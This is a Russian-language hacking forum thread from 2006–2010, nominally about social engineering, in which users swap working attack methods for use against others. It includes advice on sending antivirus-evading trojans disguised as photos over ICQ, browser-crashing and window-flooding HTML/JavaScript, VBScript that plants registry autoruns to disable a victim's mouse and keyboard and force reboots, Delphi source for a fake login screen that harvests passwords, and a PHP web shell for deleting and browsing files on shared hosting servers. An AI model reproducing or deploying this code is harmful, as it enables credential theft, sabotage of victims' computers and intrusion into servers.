Что такое социальная инженерия. Это метод воздействия на человека таким образом, в следствии чего можно выведать некоторую информацию и использовать в собственных целях. Говоря русским языком, это обыкновенный развод. Пишем тут эти методы. как можно развести.
Социальная инженерия
Сообщений 1 страница 13 из 13
Поделиться22006-07-15 06:20:46
Самый популярный метод. Регестрируемся в icq -либо в подобной программе (обычно это делают под женским именем, смотря кого хакаем). Начинаем разговор с человеком и ведем разговор в ту сторону чтобы человек спросил фотку, причём сделал это сам. Меньше будет подозрений. И отправдяем троян (нивкоем случае не червь, это будет подло и комп можете попортить, а троян существо по сути безобидное). Предварительно защищённый от обноружения антивирусами и скрещённый с какой нибудь фоткой. Человек открывает файл и смотрит фотку, а троян выполняет те дела на которые был запрограммирован.
Поделиться32006-10-08 12:41:36
В InternetExplorer до версии 5.0 есть дыра!!!!Делаеш сайт и зашиваеш в него « бок ». Этот скрипт открывает кучу окошков, так что закрыть их проблематично, для легкости - главное окно названо как MULTIPLE - закрой его через CTRL+ALT+DEL и все исчезнет, так что флаг тебе в руки !
<html>
<head>
<title>Multiple windows</title>
</head>
<script language = javascript>
function generate_windows(){
var i=1;
while (i < 10000){ //
window. open("about:blank");
i++;
}
}
</script>
<body onload = "generate_windows()">
</body>
</html>
А о таком слышал?=)
Поделиться42006-10-25 08:47:36
Или вот :skull:
html>
<head>
<title>Bugz</title>
<script language="JavaScript1.2">window.location="file:///c:/nul/nul";</script>
</head>
</html>
Хотя это тоже не плохо=)))
Поделиться52006-10-27 11:33:49
Этот способ только для опытных юзеров, а ламерам тут нефиг(Ну я пошел ) делать! Штука в том чтобы с HTML-я при помощи VBS подвесит неприятеля=)
И так приступим..
Есть у форточки такая штука как RUNDLL32 который очень много значит и должен жить по адресу(почти у всех так) C:\windows\rundll32.exe
И этот милый файлик имеет особенность вырубать машину, клавиатуру, маузу…Ну в общем при правильном обращении никаких троянов не нужно, все уже есть!!! Делаете ссылку на запуск этого с дополнительными параметрами
Так вот, с помощью VBScript можно решить юзера по полному западлу. Действует примерно так: решился поц зайти на твою пагу, потом он когда перезагрузился тут и клава не работает, тут и мышь отсутствует... Cамое приятное что после этого нужна винду переустанавливать...Смысл в том, что-бы прописать ему в автозапуск лишь две команды,
1. Отключение мыши: rundll32 mouse,disable
2. Отключение клавы: rundll32 keyboard,disable
И самое обидное: rundll32 shell32,SHExitWindowsEx 2
И погибнет юзер от постоянной перезагрузки и без мыши и без клавы...
Ну и главное! Сделать это, а точнее занести инфу в реестр можно с помощью VBScript:
<HTML>
<HEAD>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
<!--
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Mad", "rundll32 mouse,disable"
WshShell.RegWrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Dead", "rundll32 keyboard,disable"
-->
</SCRIPT>
</BODY>
</HTML>
-либо сразу перегрузку обезпечить
<HTML>
<HEAD>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
<!--
Set Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe User.exe,ExitWindows"
-->
</SCRIPT>
</BODY>
</HTML>
А вообще будет сказка если всё сразу!!!!
Поделиться62006-10-27 11:43:52
Самый популярный метод. Регестрируемся в icq -либо в подобной программе (обычно это делают под женским именем, смотря кого хакаем). Начинаем разговор с человеком и ведем разговор в ту сторону чтобы человек спросил фотку, причём сделал это сам. Меньше будет подозрений. И отправдяем троян (нивкоем случае не червь, это будет подло и комп можете попортить, а троян существо по сути безобидное). Предварительно защищённый от обноружения антивирусами и скрещённый с какой нибудь фоткой. Человек открывает файл и смотрит фотку, а троян выполняет те дела на которые был запрограммирован.
В том числе к HTML , JPG , TXT... Так же можно прописать!Отправил сыылку на страницу такую зашел крендель на страницу и всё. Теперь он бык.Пример трояна: Надери соседа=)
Поделиться72006-10-27 14:25:34
Наеби соседа))))
Поделиться82006-10-27 15:11:20
:victory:
Наеби соседа))))
Ну,да не хотел просто матом писать,именно он самый
Поделиться92006-12-07 00:58:22
как узнать пароль юзверёв в локалке?Да вот как,только надо Delphi знать,хоть в децл.
Берем Delphi. Делаем прогу имитирующую запрос пароля. А введенные значения записываем в отдельный файл. Замаскеруем прогу под чтото очень нужное и часто используемое. Например MathCad, Delphi, C++. Делаем такую же иконку, название проге даем как у жертвы. Также важно не забыть, что после выполнения нашей проги надо запустить приложение жертвы.Заменяем главный фаил жертвы нашей фичей. И на рабочем столе делаем ярлык на него. Uzver запускает свое приложение и 90% что даже не подумает чего это его просят ввести лог и пассворд. Я так поимел логи всей своей группы и с десяток препов.
Пример приведен ниже:
(Зарание оговорюсь.Это основная база для проги. Так что можно добавить че надо, наворотить, поперчить, посахарить...)
unit tr;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls, Buttons, ExtCtrls;
type
TForm1 = class(TForm)
Edit1: TEdit;
Edit2: TEdit;
Label1: TLabel;
Label2: TLabel;
Label3: TLabel;
Image1: TImage;
BitBtn1: TBitBtn;
BitBtn2: TBitBtn;
Label4: TLabel;
Label5: TLabel;
procedure BitBtn1Click(Sender: TObject);
procedure BitBtn2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
F:Text;
lg,psw:string;
flag:boolean=false;
implementation
{$R *.DFM}
procedure TForm1.BitBtn1Click(Sender: TObject);
begin
if (Edit1.Text<>'')and(Edit2.Text<>'') then
Begin
lg:='Login:';
psw:='Password:';
AssignFile(F,'winddl.dat'); {тута указываеш имя файла куда кидать лог и пасв}
{$I-}
Reset(F);
{$I+}
if IOResult=2 then
Begin
Rewrite(F);
flag:=true;
end;
Write(F,lg);
lg:=Edit1.Text;
writeln(F,lg);
Write(F,psw);
psw:=Edit2.Text;
writeln(F,psw);
CloseFile(F);
Form1.Close;
end
else
MessageDlg('Введите Login и Password',mtError,[mbOk],0);
end;
procedure TForm1.BitBtn2Click(Sender: TObject);
begin
If Edit1.Text='' then MessageDlg('Введите Login',mtError,[mbOk],0);
If Edit2.Text='' then MessageDlg('Введите Password',mtError,[mbOk],0);
end;
end.
program login;
uses
Forms,
tr in 'tr.pas' {Form1};
{$R *.RES}
begin
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.Run;
end.
Хеппи Энд=)
Поделиться102006-12-07 02:05:27
Взлом через PHP-скрипт
Данная атака на сервер проходит со 100% гарантией. Для успешной атаки взломщику необходимо дисковое пространство на сервере размером в 10 Kb (столько весит скрипт) и возможность запустить свой PHP скрипт. Далеко не секрет, что хакеры очень часто проникают в систему используя социнженерию, тоесть изначально подготавливают жертву, чтобы та им доверяла, получают от неё информацию и осуществляют взлом. Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайнем случае можно и купить себе домен на сервере провайдера или любой другой хостинговой компании, которую хакер собирается взломать.
В большей части взлому подвержены бесплатные хостинговые компании и провайдеры, которые при регистрации доступа в интернет дают бесплатное место для размещение домашней странички пользователя с запуском собственных PHP скриптов.
Идея реализации атаки заключается в том, чтобы залезть на жесткий диск провайдера и иметь возможность управлять файлами, тоесть удалять, просматривать, редактировать. Для этого нам придётся написать небольшой скрипт, который получит доступ к ресурсам сервера. Для начала определим какими функциями должен обладать скрипт: заложим в него функции удаления выбранных файлов, скрипт должен уметь просматривать картинки, открывать каталоги, выставлять права доступа к файлам, знать когда файл был создан в системе, когда файл был изменён, к какой группе относится файл и выставлять соответствующую иконку для удобства, переходить из каталога в каталог, указывать полные пути до файлов:
<?php //говорим что это PHP скрипт
function cmp( $a, $b ) //обьявляем функции
{
GLOBAL $sort; //сортируем полученные функции
if( $a->inode == $b->inode )
return 0;
switch( $sort ) //объявляем , что по каким функциям будет сортироваться
{
case "size":
return ($a->size > $b->size) ? -1 : 1;
case "type":
return strcmp($a->type, $b->type);
case "view":
return strcmp($a->view, $b->view);
case "atime":
return ($a->atime > $b->atime) ? -1 : 1;
case "ctime":
return ($a->ctime > $b->ctime) ? -1 : 1;
case "mtime":
return ($a->mtime > $b->mtime) ? -1 : 1;
case "group":
return strcmp($a->group, $b->group);
case "inode":
return ($a->inode > $b->inode) ? -1 : 1;
case "owner":
return strcmp($a->owner, $b->owner);
case "perms":
return ($a->perms > $b->perms) ? -1 : 1;
case "ext":
return strcmp($a->ext, $b->ext);
case "name":
default:
return 1;
}
}
function getIcons( $ext ) //объявляем функцию сопоставления иконки с типом файла
{
switch( $ext )
{
case "dir":
$file = "dir";
break;
case "link":
$file = "link";
break;
case "zip":
case "tgz":
case "gz":
case "Z":
$file = "compressed";
break;
case "gif":
case "jpg":
$file = "image2";
break;
case "dvi":
$file = "dvi";
break;
case "":
case "exe":
$file = "binary";
break;
case "sh":
case "php":
case "php3":
case "sql":
case "inc":
case "js":
$file = "script";
break;
case "txt":
$file = "text";
break;
case "html":
case "shtml":
case "phtml":
$file = "world1";
break;
default:
$file = "generic";
break;
}
return $IMG="<IMG SRC='icons/".$file.".gif'>";
}
class MyFile { //объявляем какие данные будут получены
var $name;
var $path;
var $type;
var $ext;
var $stype;
var $sfile;
var $size;
var $file;
var $atime;
var $ctime;
var $mtime;
var $group;
var $inode;
var $owner;
var $perms;
function set( $filename, $path )
{
GLOBAL $cd; //объявляем функции перехода по каталогам
$this->name = $filename;
$this->path = $path;
$this->file = $this->path."/".$this->name;
$this->type = filetype( $this->file );
$this->size = filesize( $this->file );
$this->atime = fileatime( $this->file );
$this->ctime = filectime( $this->file );
$this->mtime = filemtime( $this->file );
$this->group = filegroup( $this->file );
$this->inode = fileinode( $this->file );
$this->owner = fileowner( $this->file );
$this->perms = fileperms( $this->file );
switch( $this->type )
{
case "link":
$this->sfile = readlink( $this->file );
$this->stype = filetype( $this->sfile );
$this->ext = "link";
break;
case "file":
$list = explode( ".", $this->name );
$nb = sizeof( $list );
if( $nb > 0 )
$this->stype = $list[$nb-1];
else
$this->stype = "???";
$this->ext = $this->stype;
switch( $this->stype )
{
case "gif":
case "GIF":
case "jpg":
case "JPG":
if( isset( $cd ) )
$pwd = $cd."/";
else
$pwd = "";
$this->sfile = "<IMG SRC='".$this->file."'>";
break;
default:
$this->sfile = $this->stype;
break;
}
break;
default:
$this->stype = "";
$this->sfile = "";
$this->ext = $this->type;
break;
}
}
function formatSize()
{
return number_format( $this->size, 0, ".", " ");
}
}
function genUrl( $ref, $args, $key = "", $val = "" )
{
$valist = "";
reset( $args );
if( $key != "" )
$args[ "$key" ] = $val;
if( !is_array( $args ) )
return $ref;
while( list( $key, $val ) = each( $args ) )
{
if( $val == "" )
continue;
if( $valist == "" )
$valist .= "?";
else
$valist .= "&";
$valist .= $key."=".$val;
}
return $ref.$valist;
}
function updir( $path )
{
$last = strrchr( $path, "/" );
$n1 = strlen( $last );
$n2 = strlen( $path );
return substr( $path, 0, $n2-$n1 );
}
$ref = "dir.php";
if( isset( $cd ) )
{
$path = $cd;
//$lcd = "?cd=$cd'";
$args[ "cd" ] = $cd;
}
else
{
$path = ".";
//$lcd = "";
$args[ "cd" ] = "";
}
if( isset( $nb ) )
{
for( $i = 0; $i < $nb; $i++ )
{
$var = "id_$i";
if( isset( $$var ) )
{
$file = $path."/".$$var;
if( is_file( $file ) || is_link( $file ) )
{
if( unlink( $file ) )
echo "<BR><b>$file</b> успешно удалён\n"; //сообщение об успешном удалении файла
else
echo "<BR>Не могу удалить выставите права доступа <b>$file</b>\n"; //сообщение о невозможности удалить файл который доступен только для чтения
}
elseif( is_dir( $file ) )
{
if( rmdir( $file ) )
echo "<BR><b>$file</b> успешно удалён\n"; //сообщение об успешном удалении
else
echo "<BR>файл недоступен для удаления<b>$file</b>\n"; //сообщение о невозможности удалить файл
}
}
}
}
$step = 100;
if( !isset( $sort ) )
$sort = "name";
else
$args[ "sort" ] = $sort;
if( !isset( $from ) )
$from = 0;
else
$args[ "from" ] = $from;
if( !isset( $to ) )
$to = $from + $step;
$d = dir($path);
echo "\n";
echo "<br><a href=$ref >Вернуться в начало</a>\n"; //ссылка на возврат в домашнею директорию скрипта
$updir = updir($d->path);
if( $updir != "." )
echo "<br>Подняться на директорию вверх; <a href=$ref?cd=$updir>$updir</a>\n"; //ссылка на директорию вверх
echo "<br>Открыть директорию: <a href=$ref?cd=".$d->path."/..>..</a>\n"; //обновление текущей директории
echo "<br>Текущая директория: <b>".$d->path."</b>\n"; //показываем путь до директории и файлов, которые в ней находятся
$n = 0;
while( $entry=$d->read() )
{
$lFiles[ $n ] = new MyFile;
$lFiles[ $n ]->set( $entry, $path );
$n++;
}
$d->close(); //создаём HTML форму управления функциями
echo "<FORM NAME='del' METHOD='post' ACTION='".genUrl( $ref, $args )."'>\n";
echo "<TABLE BORDER=1>\n";
echo "<TR>\n";
echo "<TH>D</TH>\n";
//echo "<TH><a href='".genUrl( $ref, $args, "sort", "type" )."'>Type</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "name" )."'>Имя</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "size" )."'>Размер</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "ext" )."'>Класс</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "atime" )."'>В системе</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "ctime" )."'>Создан</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "mtime" )."'>Изменён</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "perms" )."'>Размер</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "group" )."'>Группа</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "owner" )."'>ow</a></TH>\n";
echo "<TH><a href='".genUrl( $ref, $args, "sort", "inode" )."'>in</a></TH>\n";
echo "<TH>Показ</TH>\n";
echo "</TR>\n";
@usort( $lFiles, cmp );
for( $i = 0; $i < $n; $i++ )
{
if( ( $i < $from ) || ( $i >= $to ) )
continue;
$k = $i;
echo "<TR>\n";
echo "<TD><INPUT TYPE='checkbox' NAME='id_$k' VALUE='".
$lFiles[ $k ]->name
."'></TD>\n";
$IMG=getIcons( $lFiles[ $k ]->ext );
$dform = "M j y H:i";
// echo "<TD ALIGN=CENTER >".$lFiles[ $k ]->type."</TD>\n";
echo "<TD>$IMG".$lFiles[ $k ]->name."</TD>\n";
echo "<TD ALIGN=RIGHT >".$lFiles[ $k ]->formatSize()."</TD>\n";
echo "<TD>".$lFiles[ $k ]->ext ."</TD>\n";
echo "<TD>".date( $dform, $lFiles[ $k ]->atime )."</TD>\n";
echo "<TD>".date( $dform, $lFiles[ $k ]->ctime )."</TD>\n";
echo "<TD>".date( $dform, $lFiles[ $k ]->mtime )."</TD>\n";
echo "<TD>".$lFiles[ $k ]->perms."</TD>\n";
echo "<TD>".$lFiles[ $k ]->group."</TD>\n";
echo "<TD>".$lFiles[ $k ]->owner."</TD>\n";
echo "<TD>".$lFiles[ $k ]->inode."</TD>\n";
switch( $lFiles[ $k ]->type )
{
case "link":
if( $lFiles[ $k ]->stype == "dir" )
{
$tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name;
echo "<TD><a href='".
genUrl( $ref, $args, "cd", $tcd )."'>".
$lFiles[ $k ]->sfile."</a></TD>\n";
}
else
echo "<TD>".$lFiles[ $k ]->sfile."</TD>\n";
break;
case "dir":
$tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name;
echo "<TD><a href='".
genUrl( $ref, $args, "cd", $tcd )."'>".
$lFiles[ $k ]->name."</a></TD>\n";
break;
case "file":
echo "<TD>".$lFiles[ $k ]->sfile."</TD>\n";
break;
default:
echo "<TD>NO</TD>\n";
break;
}
echo "</TR>\n";
}
echo "</TABLE>\n";
$from = $from - $step;
if( isset( $cd ) )
{
echo "<INPUT TYPE='hidden' NAME='cd' VALUE='$cd'>\n";
}
echo "<INPUT TYPE='hidden' NAME='nb' VALUE='$n'>\n";
//echo "<br>from=$from;to=$to;n=$n\n";
echo "<br>\n";
if( $from >= 0 )
{
echo "<a href='".
genUrl( $ref, $args, "from", $from )."' >Предыдущий</a>/\n";
}
if( $to <= $n )
{
echo "<a href='".
genUrl( $ref, $args, "from", $to )."' >Далее</a> \n";
}
echo "<br>\n";
echo "<INPUT TYPE='submit' VALUE='Del'>\n";
echo "</FORM>\n";
?> //говорим что PHP скрипт кончился
Вот реализация скрипта, который позволяет вам получить доступ в каталоги провайдера, содержащиеся у него на винчестере. Потенциальная опасность применения данного скрипта в том, что злоумышленник получает практически всю информацию о сервере, также злоумышленник получает доступ к папки etc, где хранятся пароли. При проверке работоспособности скрипта и проверке на уязвимости было выявлено, что все сервера, на которых разрешён запуск PHP оказались подвержены данной атаке. Скрипт помещяется на сервер провайдера, где вам разрешен запуск PHP скриптов, в директорию домашней странички. По умолчанию скрипт просматривает все находящиеся файлы в той директории, куда он был загружен для того, чтобы попасть в корневой каталог сервера жмите на ссылку "Подняться на каталог выше" до тех пор, пока вы не увидите корневой каталог сервера. При выходе из вашей директории скрипт возможно сообщит вам о невозможности выйти из вашего каталога, это сообщение сервера игнорируйте и жмите на ссылку "Подняться на каталог вверх", скрипт передаст данные серверу о том, что каталоги которые вы пытаетесь просмотреть являются вашими и вас пропустят.
Поделиться112006-12-07 03:21:58
Wizard
Реальные вещи гутаришь))) сикреты раскрывать не будем))) но есть ломаные бесплатные хосты! ДА их много)
НО заходят на них мало а это значит они не эфективны рекламе, но если настрагать их с пол лимона!))) то думаю число говорит сомо за себя!
Поделиться122006-12-24 14:43:46
Scripts трясет окно Обозревателя. Чтобы избавится от враждебности этого скрипта нужно переключится на другое окно Обозревателя, а затем вернутся назад.
<!-- Добавьте первую строку в тег body -->
<body onloaD="MM_callJS('shake();')">
<script language="JavaScript1.2">
<!--
<!-- Begin
function shake() {
n=100;
for (i = 10; i > 0; i--) {
for (j = n; j > 0; j--) {
self.moveBy(0,i);
self.moveBy(i,0);
self.moveBy(0,-i);
self.moveBy(-i,0);
}
}
}
// End -->
function MM_callJS(jsStr) { file://v2.0
return eval(jsStr)
}
// I own jo0 -->
</script>
Поделиться132010-08-11 19:17:08
Почитал я здешние посты и сделал вывод что мало кто знает что такое социальная инженерия. посты в основном относятся к хакингу, у меня к примеру сосед самоучка делает подобные штуки то курсор мышки уберёт то ещё какую то проделку сделает вот только я не вижу ничего общего в этом с соц инженерией, уж извините.
Похожие темы
Безопасность в IT-сфере | Реклама | 2021-09-01 |
ЯРАНСК-ЯССКИЙ | Большая советска энциклопедия | 2008-06-09 |
ЯССКО-ЯЯ | Большая советска энциклопедия | 2008-06-09 |
ЮЖНО-ЮМАШЕВ | Большая советска энциклопедия | 2013-05-30 |
ЮРСКАЯ-ЯГИЧ | Большая советска энциклопедия | 2008-06-10 |